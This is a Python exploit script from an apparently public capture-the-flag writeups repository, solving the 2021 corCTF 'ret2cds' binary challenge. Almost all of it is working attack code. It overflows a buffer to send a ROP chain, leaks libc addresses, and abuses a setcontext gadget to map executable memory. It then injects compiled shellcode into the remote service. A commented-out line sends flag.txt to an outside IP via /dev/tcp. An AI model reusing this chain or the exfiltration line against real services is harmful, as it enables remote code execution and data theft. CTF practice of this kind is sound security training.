BLAHAJ/writeups
BLAHAJ
/
writeups
10
0
Fork 0
Code Issues Pull Requests Releases Wiki Activity
writeups/2021/corctf/ret2cds/exploit/exploit.py

71 lines
2.2 KiB
Python
Raw Blame History

from pwn import *
import os
context.arch = 'amd64'
def run():
elf = ELF("../challenge/chall/ret2cds")
rop = ROP(elf)
rop.write(1, elf.got['write'])
print(rop.dump())
libc = ELF("../challenge/chall/libc.so.6")
print(hex(libc.symbols['write']))
# r = process(["./ld-2.31.so", "./ret2cds"], env={"LD_PRELOAD": os.getcwd() + "/libc.so.6"})
# gdb.attach(r)
# r = remote("localhost", 1337)
r = remote("ret2cds.be.ax", 34485)
try:
r.recvuntil("warden: ")
r.sendline(b"A"*256 + b"AAAAAAAA" + rop.chain() + p64(0x0040123a))
print(r.recvline())
print(r.recvline())
leak = r.recvline()[1:8]
leak = u64(leak.ljust(8, b'\x00'))
print(hex(leak))
libc_base = leak - libc.symbols['write']
print(hex(libc_base))
libc.address = libc_base
libc_rop = ROP(libc)
libc_rop.mmap(0x133713370000, 0x10000, 7, 0x32) #, -1, 0)
libc_rop.read(0, 0x133713370000, 0x10000)
print(libc_rop.dump())
print(libc_rop.chain())
# abuse setcontext lol
# setcontext is always a good function to look for cool gadgets in
# loaded as 0x0
# 001581e1 4c 8b 4a 30 MOV R9,qword ptr [RDX + 0x30]
# 001581e5 48 8b 92 MOV RDX,qword ptr [RDX + 0x88]
# 88 00 00 00
# 001581ec 31 c0 XOR EAX,EAX
# 001581ee c3 RET
fucky_r9_gadget = p64(0x581e1 + libc_base)
# load rdx with a pointer to rodata (convenient source of 0x0s) offset so that r9 gets
pre_rop = ROP(libc)
pre_rop.rdx = 0x402008 - 0x30
r.sendline(b"A"*256 + b"AAAAAAAA" + pre_rop.chain() + fucky_r9_gadget + libc_rop.chain() + p64(0x133713370000))
os.system("make")
with open("implant.bin", "rb") as f:
shellcode = f.read()
shellcode += b"\x00" * (0x10000 - len(shellcode))
r.send(shellcode)
# stage3 = asm(shellcraft.amd64.linux.execve("/bin/bash", ["/bin/bash", "-c", "touch /tmp/hax; cat flag.txt > /dev/tcp/44.44.127.10/1337"], {}))
r.interactive()
finally:
r.close()
if __name__ == "__main__":
run()
Reference in New Issue View Git Blame Copy Permalink